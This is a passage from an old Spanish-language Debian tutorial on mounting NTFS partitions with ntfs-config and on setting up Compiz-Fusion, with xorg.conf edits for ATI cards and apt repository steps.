Pues ya tenemos agregado nuestra partición en el fstab. Ahora solo falta reiniciar el PC (aquí sí que es obligatorio), y comprobar que todo funciona bien y todos pueden secribir la partición. Y otra cosa, este proceso tarda un poco más en interactuar con la partición ntfs en comparación con otros formatos ya que no está completamente desarrollado aún, así que paciencia. Como siempre, todo se puedo personalizar a gusto del consumidor ;)

Forma Automática

Pero aún existe otra forma de configurar una partición ntfs en Debian mediante nfts-3g. Es una forma automatizada que actúa mediante una interfaz gráfica. Entonces os estaréis preguntando para que os enseñé todo lo de arriba. Pues contesto, para que sepáis como funcionan las cosas y poder arreglar problemas que se puedan sufrir.

Este método consiste en instalar un .deb, pero en este caso no estará en los repositorios. Antes instalamos un paquete adicional, dependencia necesaria para la posterior instalación del otro: libc6

Y ahora buscamos el paquete en Google, ntfs-config, lo instalamos tal y como ya sabemos y luego lo ejecutamos desde la consola (root):

ntfs-config

Ahora lo configuramos todo a nuestro gusto y listo.

NOTA: Dicho paquete está en los repositorios de Ubuntu. Es posible añadir dichos repositorios para instalar el paquete, pero para nada recomendable, ya que puede causar indestabilidad al no estar optimizado para Debian.

El proceso funciona bien pero recomendaría tener una partición FAT32 de intercambio de datos entre Windows y nuestro Debian, ya que ese formato es reconocido por ambos sistemas. La única pega de este formato es que no permite almacenar archivos mayores de 4gb, lo que en nuestros tiempos puede suponer un problema.

8. Compiz-Fusion en Debian

Por Andrey

Probablemente este gestor de ventanas haya sido tu única razón para probar Linux. Y con razón... Realmente es espectacular. Nos permite hacer efectos de escritorio y ventanas jamás vistos y además avanza imparable en cuanto a la cantidad y calidad de los efectos.

Ya sabemos que Compiz-Fusion es un gestor de ventanas resultado de la unión de Beryl y Compiz. Deja por los suelos a muchos gestores de ventanas y realmente es muy espectacular. Como mínimo necesitaremos 32 mb de RAM, y un procesador de 1200mHz. y el software gráfico actualizado.

Si queremos que Beryl nos corra con soltura y utilizarlo en la navegación diaria necesitaríamos una tarjeta Gráfica Nvidia o Intel. Las ATI no son la mejor opción, aunque también explicaré como ponerlo en las ATI.

XGL/AIGLX

Todo esto para un novato es como una telaraña. Para poder correr CF (Compiz-Fusion) necesitaremos tener activada alguno de estos componentes que lo que proporcionan es una aceleración especial para CF( gestores de Ventanas 3D, en general). Cada una tiene características distintas y diferentes formas de actuar.

XGL y AIGLX son dos motores diferentes. La principal diferencia entre ellos es que su forma de acceder al driver, y conseguir aceleración gráfica para CF es diferente.

Por ejemplo, AIGLX provee aceleración indirecta para CF, pero mas rápida de controlar. Viene incluido en los drivers nVidia.

XGL provee aceleración directa, pero tiene que saltar más pasos para ello.

Bajo ATI

Hace tiempo que los que tenemos tarjetas gráficas ATI nos peleamos por poder instalar Beryl y con la salida de CF seguimos en ello aunque han mejorado algunos aspectos. La única manera, hasta ahora, de poder correr CF en Debian es instalando y configurando el driver libre.
Ya dije al principio que ATI no es la mejor opción par correr CF. Al menos no está muy bien para utilizarlo día a día pero para impresionar a los colegas es mas que suficiente. El único modo que funciona hasta ahora es el de AIGLX.

El problema reside en que el driver propietario (el que da muy buen rendimiento) “fglrx” simplemente no tiene las extensiones necesarias para trabajar con AIGLX y por eso no podemos activar la extensión compositing, y por consiguiente, no podemos correr CF.

Este manual lo probé en una ATI Radeon 9600 y otras personas en una 9200SE y en una 9800 y va a la perfección. Lo más seguro es que vaya también con otras gráficas.

Cuando tenemos ya instalados los drivers libres indicaremos a xorg.conf que es lo que tiene que utilizar. Abriremos de nuevo el xorg.conf con el comando de siempre (root):

gedit /etc/X11/xorg.conf

En la sección “ServerLayout”, añadimos lo siguiente (solo lo que está en negrita):

Section "ServerLayout"
Identifier "Default Layout"
Screen "Default Screen" 0 0
InputDevice "Generic Keyboard"
InputDevice "Configured Mouse"
Option "AIGLX" "true"
EndSection

La sección donde pone “Modules” debe quedar con estos módulos activos:

Section "Module"
Load "i2c"
Load "bitmap"
Load "ddc"
Load "dri"
Load "extmod"
Load "freetype"
Load "glx"
Load "int10"
Load "vbe"
Load "ati"
EndSection

A partir de ahora la cosa se pone un poco mas personal ya que la opciones dichas a continuación no son soportadas por todas las gráficas. Así que lo que está en rojo se debe poner o quitar según tengas aceleración o no.

En el caso de fallo utilizar el comando de siempre (lo repito abajo). Si te falla el servidor gráfico o no hay aceleración (verás como comprobarlo mas abajo), simplemente ves quitando una a una las opciones en rojo hasta conseguir la aceleración.
Añadimos lo que está en negrita (y en rojo, valga la redundancia):

Section "Device"
Identifier "ATI Radeon 9600”
Driver "radeon"
BusID "PCI:1:0:0"
Option "AGPMode" "8
Option "EnablePageFlip" "true"
Option "ColorTiling" "true"
Option "EnableDepthMoves" "true"
Option "BackingStore" "true"
Option "AccelMethod" "XAA"
Option "AccelIDFS" "true"
Option "XAANoOffscreenPixmaps" "true"
Option "AllowGLXWithComposite" "true"
Option "AddARGBGLXVisuals" "true"
EndSection

Y al final del fichero normalmente debe estar esto:

Section "DRI"
Mode 0666
EndSection

Si no lo hay lo añadimos tal cual. Y por último añadimos, también al final, esta linea para activar el compositing (este el culpable de todo el embrollo):

Section "Extensions"
Option "Composite" "true"
EndSection

Ahora, probamos reiniciar el modo gráfico o directamente el ordenador. Si el escritorio arranca sin problemas la mitad del asunto ya está superado. Pero si da algún error de las X tenemos que teclear como root en la primera consola que nos aparezca (o desde recovery mode):
dpkg-reconfigure xserver-xorg y seguir los pasos (aunque no los conozcamos). Y luego repetir el proceso de xorg.conf quitando opciones de las que están en rojo.

Si todo ha salido bien y tenemos el escritorio delante nuestro probaremos la aceleración gráfica. Antes instalaremos este paquete como ya sabemos: mesa-utils y después tecleamos en la consola:

glxinfo | grep direct

Si nos sale: "direct rendering: Yes" la aceleración está activada y ya podemos instalar Beryl, si no tenemos que ir quitando módulos en rojo para conseguirla. Yo puse las opciones que me la dan a mí y aunque no a la perfección, puedo correr CF. Para ver como se instala, sigue después del driver Nvidia.

Compiz-Fusion

Independientemente de la tarjeta gráfica que tenemos, este proceso es el mismo para todas. Ahora añadiremos el repositorio de Beryl y lo descargaremos directamente desde apt:

deb http://download.tuxfamily.org/shames/debian-sid/desktopfx/unstable/ ./

Ahora simplemente con APT:

apt-get install compiz-fusion-all emerald compiz-fusion-plugins-main compiz-fusion-plugins-main fusion-icon

Ahora escribimos un último paso para señalar el gestor de ventanas (emerald) para CF:

compiz --replace -c emerald &

Ya está. Escribimos:

fusion-icon

Seleccionamos Compiz como gestor de ventanas, y a disfrutar.
El proyecto es aún joven y no es de extrañar que pueda caerse o hacer cosas raras, pero la rapidez a la que avanza es impresionante.

9. Agradecimientos y créditos.